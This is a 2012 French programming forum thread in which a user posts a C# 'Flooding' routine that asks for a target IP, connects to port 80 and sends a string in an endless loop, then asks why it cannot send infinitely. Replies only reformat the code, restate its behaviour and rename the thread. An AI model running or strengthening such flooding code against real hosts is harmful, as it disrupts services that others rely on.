Manipulation Socket

Résolu
newbie12 Messages postés 4 Date d'inscription dimanche 15 janvier 2012 Statut Membre Dernière intervention 23 juin 2012 - 16 janv. 2012 à 20:34
NHenry Messages postés 15031 Date d'inscription vendredi 14 mars 2003 Statut Modérateur Dernière intervention 23 janvier 2023 - 25 janv. 2012 à 00:07
Bonjour, en fait j'ai un problème de Socket. Je ne peux pas envoyer un nombre infini de socket en C#. Voici mon code source, si vous pouvez identifiez certaines erreurs :

static void Main(string[] args)
{
Flooding();
}

static void Flooding()
{
Console.WriteLine("Entrez l'adresse ip de la cible");
string host = Console.ReadLine();
var continuer = true;
int port = 80;
var FloodCount = 0;
Socket sock1 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
string m = ("Good Morning, this is...");
byte[] data = System.Text.Encoding.UTF8.GetBytes(m);
byte[] reponse = new byte[1024];
sock1.Connect(host, port);
while (continuer==true)
{
sock1.Send(data, SocketFlags.None);
FloodCount++;
Console.WriteLine("Nombre de Packets envoyes : " + FloodCount);
System.Threading.Thread.Sleep(2);
};

}
A voir également:

5 réponses

Whismeril Messages postés 18196 Date d'inscription mardi 11 mars 2003 Statut Contributeur Dernière intervention 25 janvier 2023 623
16 janv. 2012 à 21:23
Bonsoir je n'y connais rien en socket et donc je ne pourrais pas t'aider.
Cependant pour celui qui le fera, ce serait cool d'utiliser la coloration syntaxique (dans la ligne d'icône juste au dessus de la zone de saisie du texte, la 3eme en partant de la droite).
Ensuite puisque c'est coloré, tu peux mettre un commentaire ici ou là, du genre "ça plante ici et le message est ....".
Enfin le titre du sujet est tellement précis que tu vas à coups sûr attirer un spécialiste réseau.

Voilà quand même ma contribution:
static void Main(string[] args) 
{ 
   Flooding(); 
} 

static void Flooding() 
{ 
  Console.WriteLine("Entrez l'adresse ip de la cible"); 
  string host = Console.ReadLine(); 
  var continuer = true; 
  int port = 80; 
  var FloodCount = 0; 
  Socket sock1 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); 
  string m = ("Good Morning, this is..."); 
  byte[] data = System.Text.Encoding.UTF8.GetBytes(m); 
  byte[] reponse = new byte[1024]; 
  sock1.Connect(host, port); 
  while (continuer==true) 
  { 
     sock1.Send(data, SocketFlags.None); 
     FloodCount++; 
     Console.WriteLine("Nombre de Packets envoyes : " + FloodCount); 
     System.Threading.Thread.Sleep(2); 
  }; 

}//c'est plus lisible non?


Whismeril
3
NHenry Messages postés 15031 Date d'inscription vendredi 14 mars 2003 Statut Modérateur Dernière intervention 23 janvier 2023 157
16 janv. 2012 à 23:15
Bonjour,

Précises ton problème, que veux-tu ?
Ton code actuel, c'est :
Demander une Ip, ouvrir un socket client vers l'hôte spécifié sur le port 80, puis boucler indéfiniment en envoyant la chaine.

---------------------------------------------------------------------
[list=ordered][*]Pour poser correctement une question et optimiser vos chances d'obtenir des réponses, pensez à lire le règlement CS, ce lien ou encore celui-ci[*]Quand vous postez un code, merci d'utiliser la coloration syntaxique (3ième icône en partant de la droite : )
[*]Si votre problème est résolu (et uniquement si c'est le cas), pensez à mettre "Réponse acceptée" sur le ou les messages qui vous ont aidés./list
---
Mon site
0
BunoCS Messages postés 15342 Date d'inscription lundi 11 juillet 2005 Statut Modérateur Dernière intervention 24 janvier 2023 103
17 janv. 2012 à 11:02
Yop,
J'ai renommé le sujet de manières plus explicites


@+
Buno, Admin CS
L'urgent est fait, l'impossible est en cours. Pour les miracles, prévoir un délai...
0
megamoche Messages postés 1 Date d'inscription vendredi 15 février 2008 Statut Membre Dernière intervention 24 janvier 2012
24 janv. 2012 à 23:56
avez vous des tuto pour apprendre les différent classe et methode c# pour les manipulation des soket et du réseau en général..
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
NHenry Messages postés 15031 Date d'inscription vendredi 14 mars 2003 Statut Modérateur Dernière intervention 23 janvier 2023 157
25 janv. 2012 à 00:07
Bonjour,

Non Megamoche, je n'en ai pas, Google par contre, c'est fort probable.

---------------------------------------------------------------------
[list=ordered][*]Pour poser correctement une question et optimiser vos chances d'obtenir des réponses, pensez à lire le règlement CS, ce lien ou encore celui-ci[*]Quand vous postez un code, merci d'utiliser la coloration syntaxique (3ième icône en partant de la droite : )
[*]Si votre problème est résolu (et uniquement si c'est le cas), pensez à mettre "Réponse acceptée" sur le ou les messages qui vous ont aidés./list
---
Mon site
0
Rejoignez-nous